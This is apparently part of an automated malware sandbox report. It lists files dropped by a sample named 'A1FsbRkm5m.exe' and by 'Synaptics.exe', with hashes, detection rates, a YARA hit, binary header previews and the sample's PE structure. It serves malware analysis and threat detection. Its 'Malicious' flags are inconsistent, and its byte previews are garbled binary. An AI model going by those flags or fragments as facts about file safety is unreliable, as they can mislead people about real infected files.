                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\sites.dll

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\._cache_A1FsbRkm5m.exe
                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1469440
                                                                                                                                                                                        Entropy (8bit):6.242110984104102
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24576:l4LEubC/9euoUCi82BbjSyM5hGfzmzJHXW+U0:UEubUo1i3eymhGfizJHK0
                                                                                                                                                                                        MD5:A2FF2C72E739E0CF4C73B623444CA39D
                                                                                                                                                                                        SHA1:FF886E63C894A20F30C136A8264CFA33D41B8331
                                                                                                                                                                                        SHA-256:C1EB83993C85E01EE6AE84EB6E05744FF8C3CCC02C41D09C22286E3012EF46FC
                                                                                                                                                                                        SHA-512:844DAB35A1625D5BF1BD814A36FB80D5670D3DFEE5CF65AD8BE53784B486DCC08898B7577A323C7C7E1E83655F861EA86C5453CFA4C3D55353D329EF3AF6320B
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                        • Filename: instbeta.exe, Detection: malicious, Browse
                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......~].:<..:<..:<...s7.<<..3D4..<..3D(.7<......2<..$n%.?<..:<...>......%<......;<..3D"..<..3D%..<..3D3.;<..$n5.;<..:<6.;<..3D0.;<..Rich:<..........................PE..L...0..\...........!.....@...$.......E.......P............................................@.................................<].......`..H-...........4..h7...........X..............................8...@............P..,............................text...f?.......@.................. ..`.rdata...=...P...>...D..............@..@.data...............................@....rsrc...H-...`......................@..@.reloc...............>..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes\NewInstallAir\NewInstallAir.ui

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\._cache_A1FsbRkm5m.exe
                                                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1163767
                                                                                                                                                                                        Entropy (8bit):7.540999711778627
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:12288:0c+G8xRG6xr9VFZJ5ZQfg55fg5jfg5HlzyYCJ6MJ6oJ6QEJW:0nGAxJVt5SfQ5fQjfQHlzX0TpUW
                                                                                                                                                                                        MD5:2B6FBCE974A465B928EE79ADABC900EF
                                                                                                                                                                                        SHA1:1C8BD6B2C3FFB3DC40CAB37811BFF3EFE651FFA0
                                                                                                                                                                                        SHA-256:6EB738FE209E2332A8A993788012A12A67AF2FBFB9E8A52537D35AA7F1E17F77
                                                                                                                                                                                        SHA-512:FA2C292FB8ADEB549A23107DEBE5E00BE1F0E2865878C5D04935A969666A98837BB71BF9ACF560412DF4B1872D429E845ED6223EBD51BAE27905B395AE882B4E
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:PK...........Q................DPI_240_Images/PK..........TP....%...%.......DPI_240_Images/bg_promote.png.PNG........IHDR.............\$......PLTE............U.wh......^.tz..........Ita0bL.?#.?$.A$.G'.P-.S..U0.W0.X1.Y2.Z2.[3.\3.^4._6.a6.d7.g9.j;.m<.o>.q@.tA.vB.yC.|E..G..I..J..K..L..M..N..O..Q..Q..S.pI.tK.xL.uJ.wJ.yK.zL.|M.}N..O..M..O.}L.{J.zJ.tH.vI.yJ.|L.}MD.@..=..?..A..E.G.A.H.-.dG.{[..9.n'.^8.f).Z"{R..O..Q..R..T..W..Y..\".^#.a&.d(.g*.k..o...............3&.5'.6(.9*.=).9(.9%.<&.=".9..5..1..-..&.....R3.W5.R3.Z6.\9._;.a=.c>.e?.f@.hA.jB.lC.nE.pE.rF.tG.uG.wH(.;<..._C.dD.iF.lJ.qL.uN.xO.|Q..R..T..V..X..U..R..P..L..K..V..X..Z..[..].._..a.h@.d;.k?.pB.uEq.........>jW(U?.F/.R>.VA.ZB.\E.`F.dG.fI.iJ.egF..%.........}.*...b...........<.~;.|9.z7.x5.w3.u1.r...U.....k.!mI+sQ...8}\...G.i......q.]R..E.&<.,4.1,.5%.9..D..J..L..L..Y.|........X.E...T.j.....a.2.^..F..1..............`..A..,..W....y0&$.....IDATx......A..P:@.A......K...$.qwx.T...[...>`...D.oW.'u...?..qy...t...,S.Y..<. M

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes\theme_NewInstallAir.xml

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\._cache_A1FsbRkm5m.exe
                                                                                                                                                                                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):26020
                                                                                                                                                                                        Entropy (8bit):3.575605175356501
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:96:E4EuXYuiODQGYuBRroRrXRrBejXvXH5CeGTNxyqIYuyLmacwrvlCX4uH3OYqELwO:6nOS+bO7lS51EHWkGHb
                                                                                                                                                                                        MD5:DCD1B47F3766756CF520111C0ADEC08A
                                                                                                                                                                                        SHA1:4A2BA5AA7A85175364005E47B8B3E8FBEDB30F82
                                                                                                                                                                                        SHA-256:8D1067F1903C8FB3D8AD0F680F8FB6A588DEFB7E115F84104205AD6674C26CEE
                                                                                                                                                                                        SHA-512:4C0BE48A8903DC5998863C52396C07ABABAF48744E275DE2AA28CD3E850255398D572BCDEFD2764C7BCEEA636463546AE1F5C28918EB4BA109D1A3B4FDBA8D3A
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.t.h.e.m.e.s.>.......<.w.i.n.d.o.w.>.........<.d.e.f.a.u.l.t. .i.c.o.n._.p.o.i.n.t.=.".4.,.4.". .s.h.o.w._.i.c.o.n.=.".0.".>...........<.c.a.n.v.a.s. .n.o.r.m.a.l.=.".0.x.f.f.2.a.b.f.1.d.". .f.i.l.l.=.".0.". .i.m.a.g.e.=.".../.N.e.w.I.n.s.t.a.l.l.A.i.r./.s.k.i.n...p.n.g."./.>...........<.b.o.r.d.e.r. .n.o.r.m.a.l.=.".0.x.f.f.6.3.8.c.3.9.". .w.i.d.t.h.=.".1.". .i.n.n.e.r.=.".0.x.f.f.f.f.f.f.f.f."./.>...........<.f.o.n.t. .b.i.n.d._.f.o.n.t._.b.y._.l.a.n.g.u.a.g.e.=.".0.". .r.e.f.=.".". .f.a.c.e.=.".._o...,..[SO,.T.a.h.o.m.a.". .c.o.l.o.r.=.".0.x.0.0.b.5.e.5.1.3.". .s.i.z.e.=.".8.". .b.o.l.d.=.".0.". .i.t.a.l.i.c.=.".0.". .u.n.d.e.r.l.i.n.e.=.".0."./.>...........<.s.h.a.d.o.w. .b.o.r.d.e.r.=.".5.,.3.,.5.,.7.". .i.m.a.g.e.=.".../.N.e.w.I.n.s.t.a.l.l.A.i.r./.w.i.n.d.o.w._.s.h.a.d.o.w...p.n.g."./.>...........<.c.a.p.t.i.o.n. .s.h.o.w.=.".1.". .h.e.i.g.h.t.=.".3.0.". .c.o.l.o.r.=.".0.x.f.f.2.c.a.6.d.3."./.

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\{C6B41049-11B3-4d6f-9F8F-46360F1E900B}.tmp

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\._cache_A1FsbRkm5m.exe
                                                                                                                                                                                        File Type:Microsoft Cabinet archive data, 1381208 bytes, 3 files
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1381208
                                                                                                                                                                                        Entropy (8bit):7.9989759905966
                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                        SSDEEP:24576:325OCGNlwNr5PL8MqxJTFlAbQZ/NGBgW45xJBFnJCSnJub2WLcixLEZzHR:40N2NFL8VBAbM/WwTFnJtJRWLcix8V
                                                                                                                                                                                        MD5:9F66B02FA3774BEF10DBDAF69DF53BB5
                                                                                                                                                                                        SHA1:6A54652892BDE044869C01D7117D7DD92DA52797
                                                                                                                                                                                        SHA-256:94A6138F9ECC86D1C4FCC7144E83514D5C2E48BCFC7D907EE6E1E3C9F8AD11A0
                                                                                                                                                                                        SHA-512:54C0AFFFD630B02FF071C69E7C6C5F7A8F59EF62F0BC582E10872AABBF0B9E646D021CE81958934AB931E75F8E0838AEDFD48BB238457BE2D6AC48B2C65AB1E3
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:MSCF....X.......,.......................R....l........~Q.. .sites.dll..e...l.....Q. .themes\theme_NewInstallAir.xml............Q5a .themes\NewInstallAir\NewInstallAir.ui..e..BJ..CK..|T..8z..IrH...L`.A..5....8Q..e.0.......4.T1.....'..v..-...V?.Wm...Uk..g2..Bx)...j.L..0..9w.}......w..w..{....k....k....y.nb...p..4.ie..r...?..0....9a.V.x.....p,.}..........<.h...C...#...q.-(u....]7qb....|..n.y.?.{j.-.9.t.e._F.....s..;.o...+..e.............._.........Gn..[sn6.e.g...V#..j.'.a..8&.y~I,.S.4+...LJf.'O..[.F....).w....ubOf.T...}S!;...D......."......J1.Ma..5...l.T......<....E.._.U..al.....w.......<..H...r......v.............1..o.uz1.......... ./...vE..N..mf...8.Bx..-{.....y.....)....o......z./.....mr.S,-#...9.....]..U....,r.w$`.lH^.R...po...o....8(..6...]..L$. [.~.%...J.V.....).v.s....5..vHu.t....c..z->..y.b..../%..yN+..O.>.ST.."!. dE.T..X..Y.w?........n.Y.-.....:..ZH.}.+..l..-..10..J.bk......~..O.<.k!{.6!Rx..2.8i@[.....S/C....=..:.z..............@....>.

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\{FCEB6694-C3F8-4b98-98BD-FCDA5F9D7A89}.tmp

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\._cache_A1FsbRkm5m.exe
                                                                                                                                                                                        File Type:Microsoft Cabinet archive data, 304652 bytes, 1 file
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):304652
                                                                                                                                                                                        Entropy (8bit):7.999195439763513
                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                        SSDEEP:6144:dl5TTOp1tnABtoSIkutXiC3NxDPYhroRN6AxPM1CKSNEZ4:1TmTAB+XddZAahrKGT
                                                                                                                                                                                        MD5:8039C279A02FEA0387E8D51BDDE541D5
                                                                                                                                                                                        SHA1:A6A52EF6C01FDE3A1A1C702C41777119DBDB203A
                                                                                                                                                                                        SHA-256:0BA9A3E6E4B89ED8C30C092845ECAB5939AFE4C701A130FDC6ECC9D0EC1A8386
                                                                                                                                                                                        SHA-512:97F45BF13FF85AD252B46C8E62D2D114E84B3AEF17AA2E3B21CE47B41B416D2000506EE9BFABBC055295817CE6D7D9771A038ACFAE514CCA852EF861751C7254
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:MSCF............,...............(...H.......`..........L.z .360P2SP.dll.h..G.G..[...3.@..."R`4..m....mnu..e.r.\.K.J.....u.Pw..9f..u..H..?7.=z."|..^ ...].fi.r...........biw.Se6".p......;N....o.rI.x...$.IN.><...o......[6.k.[.lRvl..zK.{v.kKh6!36kOi..6.3Z.`.6+.B..c.t2.B)Zq.3$..V.@w......... T..4DWF.`.W..~.<.....73o7&7.L..5....rF....E.....~.@.@{...B~~.ho.D..X..pH+.. ..}-BMrx.".dU....e".nk.D...................L..e...L..~3E.......H.r..6m.G.o..z...g......}....zT.[-.K.{.\......W?..}.^....<.z.W.y.i.z&....@.-..AJN9.[.J.]Z.....k...+.2....M.........H.H...E"....`.....p.,>Q.....D.....>.B.*{..t;bw..hb.....dW8.....eH2.l....^...KyD.Z.`I.........^W..k.$..;n.I..&.>s.8..WF...}......W)...:.-Sp<m..:\..U..]JT....Kw.(.......x.:.-..C..e..a..... {...!Y./1.MnF..05...9......}...+WR8W.z...fe...+..s5.....E.6w.rzP.&..Ii...h.....L$....Z~.}N...W9.6pMt4.f..R...RL.........CH:.Q.-a1... ........Y.......P..B.:M.........l.w..Xn.....VN...7Fk*G...3...H....i.C..`q4.Q.&.9.X...^.p/.K.(....

                                                                                                                                                                                        C:\Users\user\Desktop\._cache_A1FsbRkm5m.exe

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\A1FsbRkm5m.exe
                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):3376704
                                                                                                                                                                                        Entropy (8bit):7.662741261505647
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:98304:x3SGxXS4mA4R4FL8VH/hTFnJtJE6DfHrazkgEC:8GVlmv4yVH/XJvlDfLal
                                                                                                                                                                                        MD5:F135AB78927AA00AC4A6CAEDD23E2B7F
                                                                                                                                                                                        SHA1:D92AE8F425C683BB187BA0E124E2B40F9AB2E543
                                                                                                                                                                                        SHA-256:1A779A3B45A65B4FAF1290CFE681646CB97A6AC6F7CBD62F85022801B2B56C97
                                                                                                                                                                                        SHA-512:DC4C42F1923E9A7846D8040B9CABCA0C4C90BEA4A59B44D01AE0555842ECA3D8442C63D134BBAB140601C4C98FE270913EEC3F451F7D2C5EA1D86490EB1A5AB8
                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                        • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.w..f...f...f..)...f.......f..4.w..f.......f...4...f..4.t..f..4.b.6f...f...g......f......f...4...f.......f..Rich.f..........................PE..L....].`......................'.....q.............@...........................3......?4...@.................................H...|........?$..........N3..7....2....P............................... ...@............................................text............................... ..`.rdata...........0..................@..@.data...............................@....rsrc....?$......@$..T..............@..@.reloc........2.......2.............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                        C:\Users\user\Documents\EIVQSAOTAQ\KLIZUSIQEN.xlsm

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:Microsoft Excel 2007+
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):18387
                                                                                                                                                                                        Entropy (8bit):7.523057953697544
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                                                        MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                                                        SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                                                        SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                                                                        SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                                                                                        C:\Users\user\Documents\EIVQSAOTAQ\~$KLIZUSIQEN.xlsx

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:modified
                                                                                                                                                                                        Size (bytes):165
                                                                                                                                                                                        Entropy (8bit):1.6081032063576088
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                                                        MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                                                        SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                                                        SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                                                        SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:.pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                                                        C:\Users\user\Documents\EIVQSAOTAQ\~$cache1

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):771584
                                                                                                                                                                                        Entropy (8bit):6.636337265724821
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9IOr:ansJ39LyjbJkQFMhmC+6GD9p
                                                                                                                                                                                        MD5:589E0853896F9B8A51BAD44FD736043E
                                                                                                                                                                                        SHA1:3B33C5F593BACAE9C790E2BA9CE011AEC9CB7B96
                                                                                                                                                                                        SHA-256:4AA035A61476710EAB31F09CDFA6C23D24FE6B8EB36CD7A71DB05B0FE3B1202A
                                                                                                                                                                                        SHA-512:177074AE79E177DE28DBA04C255499E496A054FFC794AF8270D11E04F5F1EF73D000F90DBCB531430BC384A315AAF0C278B2AA91CFD016B011EF0E6A88CB044C
                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\EIVQSAOTAQ\~$cache1, Author: Joe Security
                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 90%
                                                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                                        Static File Info

                                                                                                                                                                                        General

                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                        Entropy (8bit):7.53313781981056
                                                                                                                                                                                        TrID:
                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 92.57%
                                                                                                                                                                                        • Win32 Executable Borland Delphi 7 (665061/41) 6.16%
                                                                                                                                                                                        • Windows ActiveX control (116523/4) 1.08%
                                                                                                                                                                                        • Win32 Executable Delphi generic (14689/80) 0.14%
                                                                                                                                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                                                        File name:A1FsbRkm5m.exe
                                                                                                                                                                                        File size:4148224
                                                                                                                                                                                        MD5:6a23eb71a9d38bb41d260439e66b9089
                                                                                                                                                                                        SHA1:8fb7e071f7176a17dafadf82be9fd8f69a327729
                                                                                                                                                                                        SHA256:b634a8041412c63c42bbc10264b4c70b6a84d8aeb01a7d75d89731bb551835ac
                                                                                                                                                                                        SHA512:195ce37bd24541f6584d23d48d2a79e4ab157f78f4c947f006aa2566e3a8a0351319e3cb1788eba79932d21a526035b6f1ba4943a6abc3a4bff66fe8d3691532
                                                                                                                                                                                        SSDEEP:98304:Xnsmtk2az3SGxXS4mA4R4FL8VH/hTFnJtJE6DfHrazkgEy:XLnGVlmv4yVH/XJvlDfLat
                                                                                                                                                                                        TLSH:4216E02176C18036C1731A35CE7A93A94D7ABE201F309B8B76E83E5D5F34EC26939257
                                                                                                                                                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                                                                                        File Icon

                                                                                                                                                                                        Icon Hash:79fcccccaacacccc

                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                        General

                                                                                                                                                                                        Entrypoint:0x49ab80
                                                                                                                                                                                        Entrypoint Section:CODE
                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                                                                                                                                                                                        DLL Characteristics:
                                                                                                                                                                                        Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                        File Version Major:4
                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                        Import Hash:332f7ce65ead0adfb3d35147033aabe9

                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                        Instruction
                                                                                                                                                                                        push ebp
                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                        add esp, FFFFFFF0h
                                                                                                                                                                                        mov eax, 0049A778h
                                                                                                                                                                                        call 00007F324D34F91Dh
                                                                                                                                                                                        mov eax, dword ptr [0049DBCCh]
                                                                                                                                                                                        mov eax, dword ptr [eax]
                                                                                                                                                                                        call 00007F324D3A3265h
                                                                                                                                                                                        mov eax, dword ptr [0049DBCCh]
                                                                                                                                                                                        mov eax, dword ptr [eax]
                                                                                                                                                                                        mov edx, 0049ABE0h
                                                                                                                                                                                        call 00007F324D3A2E64h
                                                                                                                                                                                        mov ecx, dword ptr [0049DBDCh]
                                                                                                                                                                                        mov eax, dword ptr [0049DBCCh]
                                                                                                                                                                                        mov eax, dword ptr [eax]
                                                                                                                                                                                        mov edx, dword ptr [00496590h]
                                                                                                                                                                                        call 00007F324D3A3254h
                                                                                                                                                                                        mov eax, dword ptr [0049DBCCh]
                                                                                                                                                                                        mov eax, dword ptr [eax]
                                                                                                                                                                                        call 00007F324D3A32C8h
                                                                                                                                                                                        call 00007F324D34D3FBh
                                                                                                                                                                                        add byte ptr [eax], al

                                                                                                                                                                                        Data Directories

                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xa00000x2a42.idata
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000x34a370.rsrc
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xa50000xa980.reloc
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0xa40180x21.rdata
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0xa40000x18.rdata
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                        Sections

                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                        CODE0x10000x99bec0x99c00False0.514164126016data6.57295787036IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                        DATA0x9b0000x2e540x3000False0.453125data4.85462079781IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                        BSS0x9e0000x11e50x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                        .idata0xa00000x2a420x2c00False0.353781960227data4.91933321603IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                        .tls0xa30000x100x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                        .rdata0xa40000x390x200False0.119140625data0.784620157709IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                                                                        .reloc0xa50000xa9800xaa00False0.589981617647data6.67412498558IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                                                                        .rsrc0xb00000x34a3700x34a400unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                                                                                                                                        Resources

                                                                                                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                                                                                                        RT_CURSOR0xb0dc80x134data
                                                                                                                                                                                        RT_CURSOR0xb0efc0x134data
                                                                                                                                                                                        RT_CURSOR0xb10300x134data
                                                                                                                                                                                        RT_CURSOR0xb11640x134data
                                                                                                                                                                                        RT_CURSOR0xb12980x134data
                                                                                                                                                                                        RT_CURSOR0xb13cc0x134data
                                                                                                                                                                                        RT_CURSOR0xb15000x134data
                                                                                                                                                                                        RT_BITMAP0xb16340x1d0data
                                                                                                                                                                                        RT_BITMAP0xb18040x1e4data
                                                                                                                                                                                        RT_BITMAP0xb19e80x1d0data
                                                                                                                                                                                        RT_BITMAP0xb1bb80x1d0data
                                                                                                                                                                                        RT_BITMAP0xb1d880x1d0data
                                                                                                                                                                                        RT_BITMAP0xb1f580x1d0data
                                                                                                                                                                                        RT_BITMAP0xb21280x1d0data
                                                                                                                                                                                        RT_BITMAP0xb22f80x1d0data
                                                                                                                                                                                        RT_BITMAP0xb24c80x1d0data
                                                                                                                                                                                        RT_BITMAP0xb26980x1d0data
                                                                                                                                                                                        RT_BITMAP0xb28680xe8GLS_BINARY_LSB_FIRST
                                                                                                                                                                                        RT_ICON0xb29500x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
                                                                                                                                                                                        RT_ICON0xb39f80x10a8dBase IV DBT of @.DBF, block length 8192, next free block index 40TurkishTurkey
                                                                                                                                                                                        RT_DIALOG0xb4aa00x52data
                                                                                                                                                                                        RT_STRING0xb4af40x358data
                                                                                                                                                                                        RT_STRING0xb4e4c0x428data
                                                                                                                                                                                        RT_STRING0xb52740x3a4data
                                                                                                                                                                                        RT_STRING0xb56180x3bcdata
                                                                                                                                                                                        RT_STRING0xb59d40x2d4data
                                                                                                                                                                                        RT_STRING0xb5ca80x334data
                                                                                                                                                                                        RT_STRING0xb5fdc0x42cdata
                                                                                                                                                                                        RT_STRING0xb64080x1f0data
                                                                                                                                                                                        RT_STRING0xb65f80x1c0data
                                                                                                                                                                                        RT_STRING0xb67b80xdcdata
                                                                                                                                                                                        RT_STRING0xb68940x320data
                                                                                                                                                                                        RT_STRING0xb6bb40xd8data
                                                                                                                                                                                        RT_STRING0xb6c8c0x118data
                                                                                                                                                                                        RT_STRING0xb6da40x268data
                                                                                                                                                                                        RT_STRING0xb700c0x3f8data
                                                                                                                                                                                        RT_STRING0xb74040x378data
                                                                                                                                                                                        RT_STRING0xb777c0x380data
                                                                                                                                                                                        RT_STRING0xb7afc0x374data
                                                                                                                                                                                        RT_STRING0xb7e700xe0data
                                                                                                                                                                                        RT_STRING0xb7f500xbcdata
